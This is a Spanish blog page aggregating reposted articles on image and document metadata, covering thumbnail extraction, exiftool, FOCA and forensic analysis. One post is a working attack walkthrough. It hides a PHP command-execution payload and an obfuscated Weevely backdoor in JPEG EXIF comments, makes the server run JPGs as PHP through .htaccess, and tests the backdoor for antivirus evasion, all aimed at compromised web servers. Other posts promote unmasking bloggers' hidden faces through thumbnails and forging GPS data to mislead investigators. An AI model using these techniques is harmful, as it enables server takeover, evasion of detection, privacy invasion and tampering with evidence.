Banner 1

Mostrando entradas con la etiqueta metadatos. Mostrar todas las entradas
Mostrando entradas con la etiqueta metadatos. Mostrar todas las entradas

Como extraer thumbnails de una imagen.

0 comentarios
Bueno, extraer de las fotografías los “datos exif” mejor conocidos como metadatos o thumbnail fue un éxito hace pocos años y sin duda mandaron a la fama al chema alonso xD.

En este caso vamos a ver un ejemplo sencillo:

Bajamos una imagen

¿Para que sirve?

Por ejemplo, los blogueros ponen una foto en su perfil o en su pagina, esta foto muestra los pies, los ojos o con paint se ponen unos rayones para que no se vea su horrible y deformado rostro, ahí es cuando entras tu, extraes el thumbnail que vendria siendo una foto original, pero en miniatura.

¿Cómo le hago?

El programa se llama jhead, primero tienes que saber que sistema operativo tienes (OS-X, Linux o Windows), en base a eso tienes que bajar la versión que te sirva(yo baje la de Windows), la utilidad la descargas de aquí:


y lo guardas en:

C:\Documents and Settings\starfox\

*donde starfox es el nombre de tu compu.
Ahora busca una fotografia y guardala en esa misma ubicación:

C:\Documents and Settings\starfox\

Abre simbolo de sistema o en ejecutar pon cmd.exe y se va a abrir una pantallita de ms-dos, no te asustes. Dira algo parecido a esto:

C:\Documents and Settings\starfox>

Luego escribe:

C:\Documents and Settings\starfox>jhead.exe 3.jpg

*3 es el nombre de la foto en este caso. 

Con esto podras ver si efectivamente la foto tiene o no thumbnail. La mayoria de fotos que son tomadas por camara digital tienen y las de celulares tambien. Si no tiene, te dice “header missing”. En caso contrario te dira hasta el modelo de la camara. Proseguimos tecleando lo siguiente:

C:\Documents and Settings\starfox>jhead.exe -st original 3.jpg

Respeta los espacios y el guion, "original" lo puedes cambiar por el nombre que quieras, una vez hecho esto, si quieres cierras el ms-dos y te vas a esta carpeta:

C:\Documents and Settings\starfox\

Se encuentra la foto “original”, con clic derecho te vas a cambiar nombre y le agregas “.jpg” esto es para que la puedas abrir.


¡Listo! 

Fuente:
http://desperdiciodebytes.blogspot.com/2009/12/guia-del-troll-como-extraer-thumbnails.html

Referencias:
http://www.sentex.net/~mwandel/jhead/usage.html
http://www.karmany.net/diseno-grafico/17-diseno-grafico-basico/19-metadatos-imageneshttp://www.kungfoosion.com/2009/01/los-metadatos-de-cristina.html

Extraer y modificar los metadatos de un archivo (engañando al investigador)

0 comentarios
The Scramble girl by Kirainet
The Scramble girl by kirainet

ExifTool es un programa de software con el que podemos acceder y manipular los metadatos de una gran variedad de formatos (JPEG, PNG, MP3, PDF, WEBM, RAR, RTF, SWF, PDF, RAW,PSD o PSP…) incluyendo archivos de video, sonido, imágenes o texto. Es una plataforma construida sobre Perl y que se utiliza habitualmente desde linea de comandos.
exiftool_image6_video
Con esta herramienta podemos extraer lo más profundo de los datos Exifespecialmente útil a la hora de analizar una fotografía ya que podemos obtener información como la fecha y hora de creación de los archivos, cuando se modificaron, marca y modelo de cámara, la velocidad de obturación y la abertura, modo de flash, el nivel de zoom, propietario, ajustes de ISO, programas de edición de imágenes utilizados, etc…
La sintaxis más común del programa es
exiftool [parametros] [nombre_archivo]
si ejecutamos el programa sin añadir opciones, obtenemos toda la información del archivo:
exiftool imagen.jpg
exiftool_image2
Pero por lo que destaca especialmente exiftool es por su capacidad para modificar o incluso crear nuevos metadatos, las posibilidades son muy amplias y para conocerlas todas, nada como hacer un poco del viejo RTFM con
man exiftool
Una de las opciones que más me gustan es la de añadir o modificar las coordenadas de una fotografía. Por ejemplo si de repente queremos añadirle las coordenadas de no se…pongamos Nueva Caledonia ;-) lo haríamos así:
exiftool -exif:gpslatitude=”21 30″ -exif:gpslatituderef=S -exif:gpslongitude=”165 30″ -exif:gpslongituderef=E  imagen.jpg
Ahora vemos que al ejecutar el comando nos aparece un nuevo dato GPS
exiftool_image4_gps
Otras opciones interesantes son las de modificar la fecha, el autor, los comentarios y como no también la de:
eliminar todos los metadatos
exiftool -all= imagen.jpg
exiftool_image5_borrado

Instalación

ExifTool esta disponible para la mayoría de distros linux (también para OS X y Windows), si usáis openSUSE lo podéis instalar con


zypper in exiftool

Fuente: http://lamiradadelreplicante.com/2013/08/11/extraer-y-modificar-los-metadatos-de-un-archivo-con-exiftool/

La Herramienta Foca

0 comentarios
En este Post hablaremos sobre una Herramienta muy útil y muy fácil para el tipo de análisis forense para iniciales que deseen meterse en esta rama tan interesante de aprender, bueno primero bajaremos la herramienta  y lo instalamos :

link : http://www.informatica64.com/foca.aspx

Nuestros primeros pasos en Foca :
























Entrar a " Project " , le damos en "New Project"  y vamos a llegar los datos con la url de la web que deseamos analizar ,así como vemos en la siguiente Imagen  :
























le damos "Create " Guardamos el Proyecto en una carpeta y en seguida estará analizando los archivos las cuales tendrán los  Metadatos de sus archivos  entre las conecciones " Network" para ver los usuarios de conectados ETC ,entre ellos podemos ya tener en cuenta los objetivos de ataque ,ya con una manera mas organizada .





Como vemos en esta imagen  nos salen documentos de " microsoft Office " entre otros, bueno para comenzare a explicar  como pueden ser tan peligrosos estos archivos para un ataque de identidad de el ordenador , o simplemente para dar a conocer el origen de creación de dichos files, pero que son los Metadatos ?
Los metadatos son datos de datos  . usted me diría   " Quee es eso  ? "  déjeme decirle que cuando crea un archivo ya sea en un documento de Office, automáticamente Nuestra " PC "  guarda información muy clasificada de datos a nuestro documento " Invisiblemente " pero que es lo que esconde esta información de datos en nuestros archivos " El nombre de usuario donde fue Creado " La fecha de creación  , " la Edición " , los tipos de hardware  y Software que estuvieron Conectados en dicho Proceso  claro que esto seria en una archivo ,En  una foto seria " La Geolocalizacion de donde se tomo la foto " , la marca del celular o sistema inteligente donde se tomo la foto ", o si simplemente de edito la foto añadiendo nuevas cosas o eliminando algun grafico, podemos ver su estado original ,sorprenderte verdad ? 
Pues sigamos como vimos documentos yo pasare a seleccionar todos los documentos y añadiré la opción "Download All "  luego que empiece  a cagar toda la barra y salga un punto verde pondre   nuevamente seleccionare todos  y pondré  "Extract Metadata " y En segundos estará Extrayendo los metadatos 
Como vemos en la pantalla " Metadata Summary"  ya hemos recogido información clasificada de dichos archivos , pasaremos a verlos en las siguientes imágenes :
Como vemos esta es la Sección "  Usuarios " donde vemos que salen los nombres de los  Ordenadores donde fueron creados dichos documentos :
En esta otra Imagen como vemos  nos muestra " Los Sotfwares "  

Metadatos en las imagenes(twitter,facebook.etc...)

0 comentarios
Se ha puesto de moda subir a twitter/facebook/tuenti todo lo que te pasa desde tu flamante smartphone, lo que quizás muchos no saben es que estos dispositivos guardan metadatos en las imágenes que permiten localizarte (coordenadas GPS) entre otras cosas. Y es que en uno de esos procesos de recopilar información de nuestro objectivo, no podría faltar su ubicación (quizás falseada en sus datos personales).Busqueda en google de fotos.............

En la siguiente entrada daré a conocer la forma como se extraen los metadatos de un archivo, en este caso de una imagen .jpg, la información básica de imagen es la fecha de toma de la imagen, el fabricante de la cámara, el modelo de cámara utilizado, entre otros. Las herramientas de extracción de metadatos tienen como funión principal analizar o mostrar la información contenida en los metadatos de un fichero. De esta manera podemos obtener información como nombres de usuarios, nombres de equipos, rutas del equipo donde se ha creado o modificado un fichero, entre otros.


El software que vamos a implementar para este ejemplo es FOCA, lo vamos a utilizar vía online, pero se puede descargar de la página oficial http://www.informatica64.com/foca/, este software soporta varios formatos para extraer información y no almacena los ficheros subidos ni el contenido de los mismos.

EXTRAER METADATOS DE UNA IMAGEN

  • Para subir la imagen, damos clic en EXAMINAR, inmediatamente nos aparece una ventana en la cual debemos seleccionar la misma a la cual le vamos a extraer los datos, despues de haberla elegido damos clic en Open.


  • Como siguiente paso, damos clic en Analizar el fichero! y esperamos a que nos muestre los metadatos del archivo.


  • Cuando el software termina la búsqueda o scanneo de la imagen, aparece la siguiente información (METADATOS) que esta contenida en esta fotografía.Muestra la marca de la cámara en la cual se tomó la fotografía, el modelo, la fecha de la toma, cuanto pesa la imagen, la version del Flashpix, entre otros datos, los cuales se encuentran bien específicados.


Existen otros sofware para sacar los metadatos de las imagenes
hachoir-metadata, es una de las mas completas soporta 32 formatos distintos de archivos, y esta disponible para: Debian, Mandriva, Gentoo, Arch y FreeBSD
 
Más información y descarga:
http://hachoir.org/wiki/hachoir-metadata
 
ExifTool, la mejor herramienta para extraer metadatos de imágenes ya que puede trabajar con EXIF e IPTC (estándares utilizados por cámara de fotos para intercambiar ficheros de imágenes con compresión JPEG). Además reconoce metadatos insertados por cámaras: Canon, Casio, FujiFilm, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Ricoh, Sanyo, Sigma/Foveon y Sony. Disponible para Windows, Mac OSX y en modulo Perl lo que permite utilizarla en Linux.
Más información y descarga:
http://www.sno.phy.queensu.ca/~phil/exiftool/
 
Metagoofil, diseñada para extraer archivos: pdf, doc, xls y ppt de un sitio web a través de google, y analizar los metadatos de los archivos. Para obtener información y realizar un ataque o un test de intrusión. Esta escrita en python.

Más información y descarga:
http://www.edge-security.com/metagoofil.php

Pinpoint Metaviewer, permite a los usuarios extraer rápidamente meta datos del sistema de archivos, meta datos OLE contenidos en Microsoft Office y valores "hash". Destaca que puede obtener antiguos usurarios, en el caso de que fuera varias veces modificado por diferentes personas.

Más información y descarga:
http://www.pinpointlabs.com/free_tools/metaviewer/
FUENTE:
http://andres-elladooscuro.blogspot.com/2012/06/blog-post.html 

Ocultando el backdoor PHP Weevely en los metadatos de un JPG

0 comentarios

En esta entrada veremos como usar los metadatos EXIF de una imagen JPEG para ocultar código PHP, por ejemplo para dejar un backdoor en la imagen de nuestro avatar en un servidor web comprometido.

Existen muchas herramientas para manipular los campos de metadatos. Nosotros usaremos la herramienta jhead y una pequeña imagen JPG para pruebas. Primero observamos los metadatos que ya tiene la imagen:
C:\>jhead skull.jpg
File name    : skull.jpg
File size    : 13504 bytes
File date    : 2012:04:17 00:33:40
Resolution   : 100 x 105
Comment      : CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100
Ahora procedemos a añadir nuestro código:
C:\>jhead -ce skull.jpg

Modified: skull.jpg
A continuación, comprobamos el código insertado:
C:\>jhead skull.jpg
File name    : skull.jpg
File size    : 13495 bytes
File date    : 2012:04:17 00:33:40
Resolution   : 100 x 105
Comment      : php passthru($_POST['cmd']); __halt_compiler();
Usando la función passthru podremos ejecutar un comando en la máquina destino a través de una petición HTTP, preferiblemente POST a GET porque esta última es más fácil de detectar si se visualiza el log de acceso (httpd access). No necesitamos cerrar la sección PHP ya que el comando halt_compiler detendrá el compilador al parsear los datos binarios de la imagen.

Una vez que hemos "ocultado" el código en la imagen, tendremos que forzar que el servidor web maneje un fichero jpg como si fuera un fichero php. Para ello añadiremos la directiva AddType en el fichero .htaccess del directorio de las imágenes. En nuestro ejemplo usaremos un servidor XAMPP de pruebas:
C:\>echo AddType application/x-httpd-php .jpg >> d:\xampplite\htdocs\xampp\imagenes\.htaccess
Ya tenemos todo preparado para empezar a probar. Lo primero que haremos será lanzar un comando con curl:
C:\>curl -d cmd=whoami http://localhost/xampp/imagenes/skull.jpg
Ï Ó ?JFIF ??  ? ?   ¦ 3vmotos
Como veis, el comando se ha ejecutado con éxito en el servidor.

Ahora que hemos comprobado que esta técnica funciona vamos a probar con una shell en PHP. En este caso, me llamó la atención Weevely, que es un backdoor muy interesante ya que no incluye directamente el código embebido como otras shells tradicionales (c99, stunshell, etc.). Weevely es un programa en Python que nos generará un "servidor" en PHP para troyanizar el servidor web y que nos permitirá obtener un shell directo (no sólo inverso) a través de peticiones HTTP.

Si quieres utilizarlo en Windows tendrás que realizar algunas modificaciones:
core\helper.py: línea 25                f = f[8:-3].replace('\\','.')
Instalar Beautiful Soup 3.2.1 (February 16, 2012) http://www.crummy.com/software/BeautifulSoup/download/3.x/BeautifulSoup-3.2.1.tar.gz
Una vez que lo tenemos, creamos nuestro backdoor con el siguiente comando:
D:\weevely>d:\Python27\python.exe weevely.py generate password123 backdoor.php

Weevely 0.6 - Generate and manage stealth PHP backdoors
Emilio Pinna 2011-2012

+ Backdoor file 'backdoor.php' created with password 'password123'.
Vemos el contenido de nuestra shell:
php  $el2="utwaV9zZXQoJ2Vycm9yX2xvZycsICcvZtwGV2L251twbGwnKTskaz0ntwc3twN3b3JktwMTtwIzJztlY2hvICctw8Jy4katwy4n"; $el4="YXkoJycsJysnKSwgam9pbtwitwhhcnJheV9zbGljZSgkYSwtwkYygkYStwktMykpKSkpO2VjaG8gtwJzwtwvJy4katwy4twnPic7fQ=="; $uq = "zbazszez6z4z_dezczode"; $lk = "str_replace"; $el3="Pic7ZXZhbChiYtwXNlNjRfZGVjbtw2RlKtwHByZWtwdfcmVwbGFjZShhcnJheSgntwL1teXtwHc9XHNdLtwycsJy9ccy8nKtwSwgYXtwJy"; $el1="JtwGM9J2NvdW50JzstwkYTtw0ktwX0NPT0tJRTtwtpZihyZXtwNldtwCgtwkYSk9PSdwYStwcgJiYtwgJGMoJGEpPjMptwe2twl"; $uq = $lk("z", "", $uq); eval($uq($lk("tw", "", $el1.$el2.$el3.$el4)));  ?-->
Y lo subimos a un multi-motor de antivirus como NoVirusThanks para comprobar si es FuD.

Ahora tenemos que añadir la shell a los metadatos de la imagen como antes. El resultado de la info exif es el siguiente:
D:\xampplite\htdocs\xampp\imagenes>jhead  skull.jpg
File name    : skull.jpg
File size    : 14038 bytes
File date    : 2012:04:17 00:33:40
Resolution   : 100 x 105
Comment      : php $el2="utwaV9zZXQoJ2Vycm9yX2xvZycsICcvZtwGV2L251twbGwnKTskaz 0ntwc3twN3b3JktwMTtwIzJztlY2hvICctw8Jy4katwy4n"; $el4="YXkoJycsJysnKSwgam9pbtwit whhcnJheV9zbGljZSgkYSwtwkYygkYStwktMykpKSkpO2VjaG8gtwJzwtwvJy4katwy4twnPic7fQ==" ; $uq = "zbazszez6z4z_dezczode"; $lk = "str_replace"; $el3="Pic7ZXZhbChiYtwXNlNj RfZGVjbtw2RlKtwHByZWtwdfcmVwbGFjZShhcnJheSgntwL1teXtwHc9XHNdLtwycsJy9ccy8nKtwSwg YXtwJy"; $el1="JtwGM9J2NvdW50JzstwkYTtw0ktwX0NPT0tJRTtwtpZihyZXtwNldtwCgtwkYSk9P SdwYStwcgJiYtwgJGMoJGEpPjMptwe2twl"; $uq = $lk("z", "", $uq); eval($uq($lk("tw",  "", $el1.$el2.$el3.$el4))); __halt_compiler();   
Finalmente, para establecer una sesión con el servidor destino, llamamos a la URL utilizando la password definida en la creación de nuestro servidor PHP:
D:\weevely-->d:\Python27\python.exe weevely.py http://localhost/xampp/imagenes/sku
ll.jpg password123

Weevely 0.6 - Generate and manage stealth PHP backdoors
Emilio Pinna 2011-2012

[+] Starting terminal. Shell probe may take a while...

[+] List modules with  and show help with :show [module name]

Y todo con el código oculto en la inocente imagen de mi avatar ;)

Fuente: http://www.hackplayers.com/2012/04/ocultando-el-backdoor-php-weevely-en.html

Técnicas de extracción de metadatos en ficheros ofimáticos para análisis forense

0 comentarios

Hola,

Hoy usaremos una herramienta Windows. Se trata de Pinpoint Metaviewer, y es gratuíta.
El documento que usaremos de ejemplo es el Modelo Europeo de Currículum Vitae, que se ofrece en formato Microsoft Word para su descarga. Si aplicáis Pinpoint a este documento obtendréis los siguientes resultados:
pinpoint metaviewer
Si subimos el Modelo Europeo de Currículum Vitae, a Google Docs y lo exportamos como Microsoft Word, el archivo resultante es este. Si aplicamos Pinpoint a nuestro nuevo documento obtenemos que:
pinpoint metaviewer
Independientemente de lo que se puede haber perdido en la exportación de Google Docs a documento Word, lo que parece claro es que los metadatos han desaparecido.

La importancia de administrar adecuadamente los metadatos en ficheros ofimáticos
Los metadatos en documentos ofimáticos pueden ser muy útiles o muy conflictivos. En bases de datos documentales, los metadatos pueden resultar muy útiles para organizar colecciones, pero en documentos sensibles, los metadatos pueden revelar información innecesariamente. Gestionar los metadatos de los documentos ofimáticos que utilizamos debe ser una tarea inexcusable una vez que acabemos la redacción de un documento, y el que tenga dudas, que lea lo que le pasó al Gobierno británico tiempo atrás.
Entendiendo que la mayoría de usuarios que lean esto emplearán Microsoft Word, así que sugiero estos enlaces:
Cómo minimizar metadatos en Word 2003
La herramienta Quitar Ocultar Datos para Office 2003 y Office XP
Protecting Personal Data in Your Microsoft Word Documents
Remove hidden data in Microsoft Word documents
Para los que tengan curiosidad sobre cómo gestiona Word el almacenamiento de metadatos, podeís ojear este artículo. Especialmente interesante la parte de extracción de los 10 últimos autores/modificadores de un documento :)
Saludos,


FUENTE:
http://www.sahw.com/wp/archivos/2008/01/27/tecnicas-de-extraccion-de-metadatos-en-ficheros-ofimaticos-para-analisis-forense/

Objetos OLE

0 comentarios
Ya existe una entrada relacionada con el tema pero en esta explicare que son y como pueden realizar este "ataque" manualmente.

Este documento lo escribi para wow.sinfocol.org como ayuda educativa para el wargame asi que les recomiendo que se den la pasadita y se entretengan un rato.

---------------------------------------------------------------------------------------------------

Basicamente doy una introduccion de que son los objetos OLE y como trabajarlos, en este caso doy un ejemplo practico con el programa mergestreams.
Tambien busco dar una vision de como detectar esta tecnica y como estamos actualmente frente a una situacion de fuga de informacion.

Aqui dejo el link http://www.mediafire.com/?mmjm1i4xjoj de descarga

Formato PDF

Mirror:

http://www.phyrexianarena.com/wow/viewtopic.php?f=87&t=78

saludos roboticos

Los Metadatos de Cristina

0 comentarios
Hago referencia a este trabajo realizado por kungfoosion sobre la busqueda de metadatos sobre imagenes, de verdad es muy buena la investigacion y por eso la comparto

---------------------------------------------------------------------------------------------------

Hace tiempo que quería jugar con exiftool, una herramienta que permite leer y modificar los metadatos de imágenes digitales, y que mejor lugar para hacerlo que la fotogalería de presidencia de la nación.


En la fotogalería de presidencia, solamente se encuentran las fotos del actual presidente, por lo que me baje muchas fotos del comienzo de la gestión de Cristina, mas algunas de la actualidad, y realice una pequeña comparación de los metadatos de las mismas.

A continuación un ejemplo, con la salida recortada para que se pueda visualizar mejor:

~/kfs # exiftool 22120802.jpg

ExifTool Version Number : 7.37
File Name : 22120802.jpg
File Size : 353 kB
File Type : JPEG
Image Description : 22-12-08 Buenos Aires - La presidenta de la Nacion, Cristina Fernandez de Kirchner durante
los anuncios en la Quinta de Olivos.
Make : NIKON CORPORATION
Camera Model Name : NIKON D100s
Software : Adobe Photoshop CS2 Macintosh
Modify Date : 2008:12:22 13:54:23
Date/Time Original : 2008:12:22 14:25:32
Create Date : 2008:12:22 14:25:32
Components Configuration : YCbCr
Writer-Editor : Presidencia de la Nacion
Photoshop Thumbnail : (Binary data 7907 bytes, use -b option to extract)
Creator Tool : Adobe Photoshop CS2 Macintosh
Image Size : 2100x1493
Primary Platform : Microsoft Corporation

Lo mas interesante que pude encontrar en la mayoría de las fotos, me llevo directamente al fotógrafo presidencial, que se llama Victor Bugge, y hace alrededor de 30 años que es el responsable de fotografiar a todos los presidentes de la Argentina.

Googleando a Victor Bugge, podemos llegar a muchas entrevistas que se le hicieron, en donde confirma cierta información que podemos encontrar en los metadatos, como que la cámara que utiliza es una Nikon.

Poder identificar la cámara con la que se tomo una foto es muy interesante para los casos de pedofilia, en donde queremos probar la relación entre varias fotos digitales y la cámara perteneciente a un sospechoso.

Otra cosa interesante, son los thumbnails que también se encuentran guardados en los metadatos, y que podemos extraer de la siguiente forma:

exiftool -b -ThumbnailImage 22120802.jpg > thumbnail.jpg

La imagen "thumbnail.jpg" debería ser una muestra mas pequeña y de menor calidad de la foto original.

Todos los thumbnails que extraje correspondían a la foto original, pero puede llegar a pasar que ambas imágenes sean diferentes. Hay un caso muy famoso, de una conductora de televisión llamada Catherine Schwartz, que publico en su blog una foto de su cara, recortada de otra imagen. Resulta que al extraer el thumbnail, se podía visualizar la foto original de cuerpo completo en donde ella se encontraba desnuda.

Otra cosa que aparece en los metadatos, es que se utilizo Photoshop, desde la versión CS2 a la CS4, y para plataformas Windows y principalmente Macintosh. Probablemente, el Sr. Bugge cuente con por los menos dos equipos para su trabajo, tal vez una desktop y una laptop.

Ahora, ¿ para que se utilizo Photoshop ? sin ser mal pensados, podríamos decir que para reducir el tamaño de las imágenes, ya que los originales deben ser muy grandes para que se las baje todo el publico desde la Web.

Para comprobar esto, vamos a usar un programa llamado Jpegquality. Jpegquality fue desarrollado por Neal Krawetz, y permite estimar la calidad de un JPEG analizando las tablas de cuantización:

~/kfs # ./jpegquality 22120802.jpg
#File: 22120802.jpg

Quantization table
Precision=0; Table index=0 (luminance)
6 4 4 7 5 7 11 6
6 11 14 10 8 10 14 17
14 14 14 14 17 22 19 19
19 19 19 22 17 12 12 12
12 12 12 17 12 12 12 12
12 12 12 12 12 12 12 12
12 12 12 12 12 12 12 12
12 12 12 12 12 12 12 12
Estimated quality level = 87.49%
Precision=0; Table index=1 (chrominance)
7 9 9 19 12 19 34 19
19 34 20 14 14 14 20 20
14 14 14 14 20 17 12 12
12 12 12 17 17 12 12 12
12 12 12 17 12 12 12 12
12 12 12 12 12 12 12 12
12 12 12 12 12 12 12 12
12 12 12 12 12 12 12 12
Estimated quality level = 85.90%
Average quality: 87.99% (88%)
~/kfs #

Como podemos apreciar, la calidad de la imagen es de un 88%, por lo que podríamos suponer que fue "grabada" nuevamente con un tamaño menor, ya que generalmente las fotos totalmente originales suelen tener un 98% de calidad.

Para un próximo post, voy a investigar algunas técnicas un poco mas complejas para detectar modificaciones en las imágenes digitales, mientras tanto les dejo algunos links con mas información.

Mas información:

- Exiftool (basada en Perl, funciona en cualquier plataforma)
- Jpegquality de Neal Krawetz

- Creating Custom Userlists from Document Metadata
- Image Ballistics and Photo Fingerprinting
- Técnicas de extracción de metadatos en imágenes fotográficas para análisis forense
- La Fotografía Digital como Evidencia: Auténtica o Fraude
- La Fotografía Digital como Evidencia Digital (2ª parte)
- The Metadata of Politics: Obama's official digital photo

fuente:http://kungfoosion.blogspot.com/2009/01/los-metadatos-de-cristina.html
Powered by Bad Robot
Helped by Blackubay